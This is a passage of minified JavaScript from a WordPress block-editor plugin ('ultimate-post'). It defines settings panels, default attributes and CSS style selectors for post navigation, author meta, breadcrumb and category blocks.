1","ultimate-post"),value:"style1"},{img:"assets/img/layouts/builder/next_prev/next_prev_2.png",label:__("Style 2","ultimate-post"),value:"style2",pro:!0},{img:"assets/img/layouts/builder/next_prev/next_prev_3.png",label:__("Style 3","ultimate-post"),value:"style3",pro:!0}]}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!0,title:__("Content","ultimate-post"),include:[{data:{type:"color",key:"navItemBg",label:__("Background","ultimate-post")}},{data:{type:"color",key:"navItemHovBg",label:__("Hover Background","ultimate-post")}},{data:{type:"dimension",key:"navItemPadd",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"dimension",key:"navItemRad",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"border",key:"navItemBorder",label:__("Border","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{title:__("Label","ultimate-post"),depend:"headingEnable",include:[{data:{type:"tab",key:"navHeadTab",content:[{name:"previous",title:__("Previous","ultimate-post"),options:[{type:"text",key:"prevHeadText",label:__("Previous Post Text","ultimate-post")},{type:"alignment",key:"prevHeadAlign",disableJustify:!0,label:__("Prev Nav Text Align","ultimate-post")},{type:"alignment",key:"prevContentAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}]},{name:"next",title:__("Next","ultimate-post"),options:[{type:"text",key:"nextHeadText",label:__("Next Post Text","ultimate-post")},{type:"alignment",key:"nextHeadAlign",disableJustify:!0,label:__("Next Nav Text Align","ultimate-post")},{type:"alignment",key:"nextContentAlign",disableJustify:!0,label:__("Alignment","ultimate-post")}]}]}},{data:{type:"separator"}},{data:{type:"color",key:"prevHeadColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"prevHeadHovColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"prevHeadTypo",label:__("Typography","ultimate-post")}},{data:{type:"dimension",key:"prevHeadingSpace",label:__("Heading Space","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"toggle",key:"titlePosition",label:__("Align Beside Post Image","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Title","ultimate-post"),depend:"titleShow",include:[{data:{type:"color",key:"titleColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"titleHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"titleTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"titleSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Title Spacing X","ultimate-post")}},{data:{type:"range",key:"titleSpaceX",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Title Spacing y","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Date","ultimate-post"),depend:"dateShow",include:[{data:{type:"toggle",key:"datePosition",label:__("Date Below Title","ultimate-post")}},{data:{type:"color",key:"dateColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"dateHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"dateTypo",label:__("Typography","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Image","ultimate-post"),depend:"imageShow",include:[{data:{type:"range",key:"navImgWidth",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Width","ultimate-post")}},{data:{type:"range",key:"navImgHeight",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Height","ultimate-post")}},{data:{type:"dimension",key:"navImgBorderRad",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Divider","ultimate-post"),depend:"navDivider",include:[{data:{type:"color",key:"dividerColor",label:__("Color","ultimate-post")}},{data:{type:"range",key:"dividerSpace",min:0,max:200,step:1,responsive:!0,unit:!0,label:__("Space","ultimate-post")}},{data:{type:"toggle",key:"dividerBorderShape",label:__("Dividers Shape","ultimate-post")}}],store:e}),(0,o.createElement)(a.T,{initialOpen:!1,title:__("Navigation","ultimate-post"),depend:"iconShow",include:[{data:{type:"select",key:"arrowIconStyle",label:__("Arrow Icon Style","ultimate-post"),options:[{value:"Angle",icon:"rightAngle",label:__("Arrow 1","ultimate-post")},{value:"Angle2",icon:"rightAngle2",label:__("Arrow 2","ultimate-post")},{value:"ArrowLg",icon:"rightArrowLg",label:__("Arrow 3","ultimate-post")}]}},{data:{type:"color",key:"arrowColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"arrowHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"range",min:0,max:80,step:1,responsive:!0,unit:!0,key:"arrowIconSpace",label:__("space","ultimate-post")}},{data:{type:"range",key:"arrowIconSize",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Icon Size","ultimate-post")}}],store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:e}),(0,o.createElement)(a.Mg,{pro:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))},99294:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"style1"},headingEnable:{type:"boolean",default:!0,style:[{depends:[{key:"layout",condition:"!=",0:!1}]}]},imageShow:{type:"boolean",default:!0},titleShow:{type:"boolean",default:!0},dateShow:{type:"boolean",default:!0},navDivider:{type:"boolean",default:!1},iconShow:{type:"boolean",default:!0},navItemBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-nav-block-prev, \n          {{ULTP}} .ultp-nav-block-next { background:{{navItemBg}}; }"}]},navItemHovBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-nav-block-prev:hover, \n          {{ULTP}} .ultp-nav-block-next:hover { background:{{navItemHovBg}}; }"}]},navItemPadd:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-block-next, \n          {{ULTP}} .ultp-nav-block-prev { padding:{{navItemPadd}}; }"}]},navItemRad:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-block-next, \n          {{ULTP}} .ultp-nav-block-prev { border-radius:{{navItemRad}}; }"}]},navItemBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#e5e5e5",type:"solid"},style:[{selector:"{{ULTP}} .ultp-nav-block-next ,{{ULTP}} .ultp-nav-block-prev"}]},titlePosition:{type:"boolean",default:!0},prevContentAlign:{type:"string",default:"left",style:[{depends:[{key:"prevContentAlign",condition:"==",value:"left"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev { text-align:{{prevContentAlign}}; justify-content:start;}"},{depends:[{key:"prevContentAlign",condition:"==",value:"center"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev { text-align:{{prevContentAlign}}; justify-content:center;}"},{depends:[{key:"prevContentAlign",condition:"==",value:"right"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev { text-align:{{prevContentAlign}}; justify-content:end;}"}]},nextContentAlign:{type:"string",default:"right",style:[{depends:[{key:"nextContentAlign",condition:"==",value:"left"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-next { text-align:{{nextContentAlign}}; justify-content:start;}"},{depends:[{key:"nextContentAlign",condition:"==",value:"center"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-next { text-align:{{nextContentAlign}}; justify-content:center;}"},{depends:[{key:"nextContentAlign",condition:"==",value:"right"},{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-next { text-align:{{nextContentAlign}}; justify-content:end;}"}]},prevHeadingSpace:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title, \n          {{ULTP}} .ultp-block-nav .ultp-next-title { margin:{{prevHeadingSpace}}; }"}]},prevHeadText:{type:"string",default:"Previous Post"},prevHeadColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title, \n          {{ULTP}} .ultp-block-nav .ultp-next-title { color:{{prevHeadColor}}; }"}]},prevHeadHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title:hover, \n          {{ULTP}} .ultp-block-nav .ultp-next-title:hover { color:{{prevHeadHovColor}}; }"}]},prevHeadTypo:{type:"object",default:{openTypography:0,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},transform:"capitalize",decoration:"none",family:""},style:[{selector:"{{ULTP}} .ultp-block-nav .ultp-prev-title, \n          {{ULTP}} .ultp-block-nav .ultp-next-title"}]},nextHeadText:{type:"string",default:"Next Post"},prevHeadAlign:{type:"string",default:"left",style:[{depends:[{key:"titlePosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-prev-title { text-align:{{prevHeadAlign}}; }"}]},nextHeadAlign:{type:"string",default:"right",style:[{depends:[{key:"titlePosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-next-title { text-align:{{nextHeadAlign}}; }"}]},titleColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-title { color:{{titleColor}}; }"}]},titleHoverColor:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-title:hover { color:{{titleHoverColor}}; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:22,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-title"}]},titleSpace:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content {gap:{{titleSpace}}}"}]},titleSpaceX:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"imageShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-block-next .ultp-nav-text-content {margin-right:{{titleSpaceX}}} \n          {{ULTP}} .ultp-nav-block-prev .ultp-nav-text-content { margin-left:{{titleSpaceX}}}"},{depends:[{key:"imageShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-nav-text-content {margin-left:{{titleSpaceX}}} \n          {{ULTP}} .ultp-nav-block-next .ultp-nav-text-content {margin-right:0}"}]},dateColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-date { color:{{dateColor}}; }"}]},dateHoverColor:{type:"string",default:"",style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-date:hover { color:{{dateHoverColor}}; }"}]},dateTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-text-content .ultp-nav-date"}]},datePosition:{type:"boolean",default:!0,style:[{depends:[{key:"dateShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-nav-text-content .ultp-nav-date{ order:2; }"},{depends:[{key:"dateShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-nav-text-content .ultp-nav-date{ order:0; }"}]},navImgWidth:{type:"object",default:{lg:"75",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-img img{width:{{navImgWidth}}}"}]},navImgHeight:{type:"object",default:{lg:"75",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-inside .ultp-nav-img img{height:{{navImgHeight}}}"}]},navImgBorderRad:{type:"object",default:{lg:"4",unit:"px"},style:[{selector:"{{ULTP}} .ultp-nav-img img { border-radius:{{navImgBorderRad}}; }"}]},dividerColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"dividerBorderShape",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-divider {background-color:{{dividerColor}};width:2px;}"}]},dividerSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-nav {gap:{{dividerSpace}}}"},{depends:[{key:"dividerBorderShape",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-nav {gap:{{dividerSpace}}}"}]},dividerBorderShape:{type:"boolean",default:!0},arrowIconStyle:{type:"string",default:"Angle2"},arrowColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-icon > svg{ color:{{arrowColor}}; }"}]},arrowHoverColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-icon svg:hover { color:{{arrowHoverColor}}; }"}]},arrowIconSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-icon svg{width:{{arrowIconSize}}}"}]},arrowIconSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"layout",condition:"!=",value:"style2"}],selector:"{{ULTP}} .ultp-nav-block-prev .ultp-icon svg{margin-right: {{arrowIconSpace}}} \n          {{ULTP}} .ultp-nav-block-next .ultp-icon svg{margin-left: {{arrowIconSpace}}}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},23061:(e,t,l)=>{"use strict";var o=l(67294),a=l(90191),i=l(99294),n=l(81837);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/next_previous.svg",alt:"next-preview"}),attributes:i.Z,edit:a.Z,save:()=>null})},53905:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,authMetaLabelText:v,authMetAvatar:h,authMetaIconStyle:f,authMetaLabel:k,authMetaIconShow:w,currentPostId:x}}=e;(0,s.S)({blockId:y,clientId:m,currentPostId:x,setAttributes:t,checkRef:!1});const T={setAttributes:t,name:l,attributes:d,clientId:m};y&&(0,n.Kh)(d,"ultimate-post/post-author-meta",y);const _=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"color",key:"authMetaIconColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"authMetaHoverColor",label:__("Hover Color","ultimate-post")}},{data:{type:"typography",key:"authMetaTypo",label:__("Text Typography","ultimate-post")}},{data:{type:"alignment",key:"authMetaCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Avatar","ultimate-post"),depend:"authMetAvatar",include:[{data:{type:"range",key:"authMetAvSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"authMetAvRadius",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Radius","ultimate-post")}},{data:{type:"range",key:"authMetAvSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Icon","ultimate-post"),depend:"authMetaIconShow",include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"authMetaIconStyle",label:__("Style","ultimate-post")}},{data:{type:"range",key:"authMetaIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"authMetaSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:T}),(0,o.createElement)(i.T,{title:__("Label","ultimate-post"),depend:"authMetaLabel",include:[{data:{type:"text",key:"authMetaLabelText",label:__("authMeta Label Text","ultimate-post")}},{data:{type:"color",key:"authMetaLabelColor",label:__("Label Color","ultimate-post")}},{data:{type:"typography",key:"authMetaLabelTypo",label:__("Label Typography","ultimate-post")}},{data:{type:"range",key:"authMetaLabelSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Label Space X","ultimate-post")}}],store:T})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:T}),(0,o.createElement)(i.Mg,{pro:!0,store:T}),(0,o.createElement)(i.iv,{store:T}))),(0,i.dH)()),(0,o.createElement)("div",_,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-authMeta-count"},w&&""!=f&&a.ZP[f],(0,o.createElement)("div",{className:"ultp-authMeta-avatar"},h&&(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg",alt:"author img"})),k&&(0,o.createElement)("span",{className:"ultp-authMeta-label"},v),(0,o.createElement)("a",{href:"#",className:"ultp-authMeta-name"},"David Rikson"," ")))))}},5230:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},authMetaIconColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-authMeta-count > .ultp-authMeta-name { color:{{authMetaIconColor}} }"}]},authMetaHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-authMeta-count > .ultp-authMeta-name:hover{color:{{authMetaHoverColor}} }"}]},authMetaTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-name"}]},authMetAvatar:{type:"boolean",default:!0},authMetaIconShow:{type:"boolean",default:!1},authMetaCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{authMetaCountAlign}};}"}]},authMetAvSize:{type:"object",default:{lg:"30",unit:"px"},style:[{depends:[{key:"authMetAvatar",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-avatar > img { width:{{authMetAvSize}}; height:{{authMetAvSize}} }"}]},authMetAvSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"authMetAvatar",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-avatar > img { margin-right: {{authMetAvSpace}} }"}]},authMetAvRadius:{type:"object",default:{lg:"100",unit:"px"},style:[{depends:[{key:"authMetAvatar",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count .ultp-authMeta-avatar > img { border-radius:{{authMetAvRadius}}; }"}]},authMetaLabel:{type:"boolean",default:!0},authMetaIconStyle:{type:"string",default:"author1",style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}]}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count > svg, {{ULTP}} .ultp-authMeta-count > div > svg { color:{{iconColor}}; color:{{iconColor}}}"}]},authMetaIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count > svg { width:{{authMetaIconSize}}; height:{{authMetaIconSize}} }"}]},authMetaSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"authMetaIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-count > svg { margin-right: {{authMetaSpace}} }"}]},authMetaLabelText:{type:"string",default:"By",style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}]}]},authMetaLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-label { color:{{authMetaLabelColor}} }"}]},authMetaLabelTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-label"}]},authMetaLabelSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"authMetaLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-authMeta-label { margin-right: {{authMetaLabelSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},75574:(e,t,l)=>{"use strict";var o=l(67294),a=l(53905),i=l(5230),n=l(45536);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/author.svg",alt:"Post Author Meta"}),attributes:i.Z,edit:a.Z,save:()=>null})},3592:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,bcrumbSeparator:b,bcrumbSeparatorIcon:v,bcrumbName:h,bcrumbRootText:f,currentPostId:k}}=e;(0,n.S)({blockId:g,clientId:d,currentPostId:k,setAttributes:t,checkRef:!1});const w={setAttributes:t,name:l,attributes:u,clientId:d};g&&(0,i.Kh)(u,"ultimate-post/post-breadcrumb",g);const x=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"color",key:"breadcrumbColor",label:__("Text Color","ultimate-post")}},{data:{type:"color",key:"breadcrumbLinkColor",label:__("Link Color","ultimate-post")}},{data:{type:"color",key:"bcrumbLinkHoverColor",label:__("Link Hover Color","ultimate-post")}},{data:{type:"typography",key:"bcrumbTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",min:0,max:50,key:"bcrumbSpace",label:__("Space Between Items","ultimate-post")}},{data:{type:"alignment",key:"bcrumbAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"toggle",key:"bcrumbName",label:__("Show Single Post Name","ultimate-post")}},{data:{type:"text",key:"bcrumbRootText",label:__("Root Page Name","ultimate-post")}}],store:w}),(0,o.createElement)(a.T,{title:__("Separator","ultimate-post"),depend:"bcrumbSeparator",include:[{data:{type:"select",key:"bcrumbSeparatorIcon",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"greaterThan",label:__("Greater Than","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}]}},{data:{type:"color",key:"bcrumbSeparatorColor",label:__("Separator Color","ultimate-post")}},{data:{type:"range",min:0,max:50,key:"bcrumbSeparatorSize",label:__("Separator Size [px]","ultimate-post")}}],store:w})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:w}),(0,o.createElement)(a.Mg,{pro:!0,store:w}),(0,o.createElement)(a.iv,{store:w}))),(0,a.dH)()),(0,o.createElement)("div",x,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("ul",{className:`ultp-builder-breadcrumb ultp-breadcrumb-${v}`},(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#"},f.length>0?f:"Home")),b&&(0,o.createElement)("li",{className:"ultp-breadcrumb-separator"}),(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#"},"Parents")),h&&(0,o.createElement)(c,null,b&&(0,o.createElement)("li",{className:"ultp-breadcrumb-separator"}),(0,o.createElement)("li",null,"Current Page"))))))}},19030:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},bcrumbSeparator:{type:"boolean",default:!0},breadcrumbColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li {color:{{breadcrumbColor}}}"}]},breadcrumbLinkColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li > a{color:{{breadcrumbLinkColor}}}"}]},bcrumbLinkHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li a:hover {color:{{bcrumbLinkHoverColor}}}"}]},bcrumbTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb li , {{ULTP}} .ultp-builder-breadcrumb li a"}]},bcrumbSpace:{type:"string",default:12,style:[{selector:"{{ULTP}} li:not(.ultp-breadcrumb-separator) {margin: 0 {{bcrumbSpace}}px;}"}]},bcrumbAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-breadcrumb { justify-content:{{bcrumbAlign}}; }"}]},bcrumbName:{type:"boolean",default:!0},bcrumbRootText:{type:"string",default:"Home"},bcrumbSeparatorIcon:{type:"string",default:"dash",style:[{depends:[{key:"bcrumbSeparator",condition:"==",value:!0}]}]},bcrumbSeparatorColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"bcrumbSeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-breadcrumb .ultp-breadcrumb-separator {color:{{bcrumbSeparatorColor}};}"},{depends:[{key:"bcrumbSeparator",condition:"==",value:!0},{key:"bcrumbSeparatorIcon",condition:"==",value:"dot"}],selector:"{{ULTP}} .ultp-builder-breadcrumb .ultp-breadcrumb-separator {background:{{bcrumbSeparatorColor}};}"}]},bcrumbSeparatorSize:{type:"string",default:"",style:[{depends:[{key:"bcrumbSeparatorIcon",condition:"==",value:"dot"},{key:"bcrumbSeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-breadcrumb li.ultp-breadcrumb-separator:after {height:{{bcrumbSeparatorSize}}px; width:{{bcrumbSeparatorSize}}px;}"},{depends:[{key:"bcrumbSeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-breadcrumb li.ultp-breadcrumb-separator:after {font-size:{{bcrumbSeparatorSize}}px;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},41458:(e,t,l)=>{"use strict";var o=l(67294),a=l(3592),i=l(19030),n=l(88211);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/breadcrumb.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},52106:(e,t,l)=>{"use strict";l.d(t,{Z:()=>d});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element;function d(e){const{setAttributes:t,name:l,attributes:d,clientId:m,className:g,attributes:{blockId:y,advanceId:b,catLabelShow:v,catLabel:h,catIconShow:f,catIconStyle:k,catSeparator:w,currentPostId:x}}=e,T={setAttributes:t,name:l,attributes:d,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:x,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(d,"ultimate-post/post-category",y);const _=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",initialOpen:!0,include:[{data:{type:"alignment",key:"catAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:["flex-start","center","flex-end"]}},{data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"catColor",label:__("Color","ultimate-post")},{type:"color2",key:"catBgColor",label:__("Background","ultimate-post")},{type:"border",key:"catItemBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"catRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"catHovColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"catBgHovColor",label:__("Hover Background","ultimate-post")},{type:"border",key:"catItemHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"catHoverRadius",label:__("Hover Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"typography",key:"catTypo",label:__("Typography","ultimate-post")}},{data:{type:"text",key:"catSeparator",label:__("Separator","ultimate-post")}},{data:{type:"range",key:"catSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Space Between Categories","ultimate-post")}},{data:{type:"dimension",key:"catItemPad",step:1,unit:!0,responsive:!0,label:__("Category 